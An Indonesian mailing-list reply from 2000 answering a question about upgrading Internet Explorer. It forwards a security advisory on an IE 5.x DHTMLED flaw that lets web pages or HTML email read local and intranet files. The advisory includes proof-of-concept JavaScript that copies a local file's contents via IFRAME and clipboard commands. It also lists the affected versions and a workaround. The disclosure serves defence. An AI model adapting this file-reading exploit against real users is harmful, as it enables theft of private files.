At 09:25 PM 7/14/00 +0700, you wrote:
>Hi miliser,
>ada yg udah pakai IE 5.5 ? Kalo tadinya pakai IE 5.0 mau download IE 5.5
>via internet, apakah IE 5.0 nya harus uninstal dulu ? kalo ya, pakai apa
sebetulnya buat apa upgrade, kalau sama sama ada holenya ?
---
IE 5.5 local text file reading vulnerability (DHTMLED)
----------------------------------------------------------------------------
----
SUMMARY
Internet Explorer 5.5 and 5.01 suffer from a security problem that enables
malicious web sites to create a special HTML page which reads the content
of any local and remotely accessible html or text file.
The real danger is reading parsed web pages from Intranet web servers that
are supposedly secured behind the firewall.
The bug is also exploitable from HTML based email messages.
DETAILS
Vulnerable Versions
Internet Explorer 5.5 (all platforms)
Internet Explorer 5.01 (all platforms)
The problem is in the DHTMLED (DHTML Edit Control is marked Safe for
Scripting for IE), which is used for basic HTML editing. It allows opening
a page with an IFRAME and has problems with DOM protection. It is possible
to select the content of the IFRAME (which may be a document residing
anywhere, including local disk), copying it to the clipboard and then
reading it from the clipboard.
Example code:
------dh2.html--------------------------------
<SCRIPT>
alert("This page reads C:\\TEST.TXT\nYou may need to create it.");
function f1()
{
dh.DOM.all.I1.focus();
dh.DOM.all.I1.document.execCommand("selectall");
dh.DOM.all.I1.document.execCommand("copy");
r=document.all.S1.createTextRange();
r.execCommand("paste");
alert("Here is your file: "+S1.value);
}
function loadit()
{
dh.loadURL("http://www.nat.bg/~joro/ifr2.html");
// ^^^^^^^^^^^^^^ You may need to edit this
setTimeout("f1()",5000);
}
setTimeout("loadit();",1000);
</SCRIPT>
---------------------------------------------------
---------ifr2.html---------------------------------
---------------------------------------------------
Demonstration is available at:
<http://www.nat.bg/~joro/dh2.html> http://www.nat.bg/~joro/dh2.html
Workaround:
As usual, disable Active Scripting or disable 'Run ActiveX controls and
plug-ins'.
ADDITIONAL INFORMATION
The information has been provided by <mailto:[EMAIL PROTECTED]> Georgi
Guninski.
========================================
------------------------------------------------------------------------
[EMAIL PROTECTED] - Mailing List MIKRODATA
Website : http:[EMAIL PROTECTED]
Archives : http://www.mail-archive.com/forum%40mikrodata.co.id/
Milis ini menjadi kontribusi beberapa rubrik yang diasuh tim MIKRODATA.
Termasuk rubrik-rubrik yang ada di media lain.
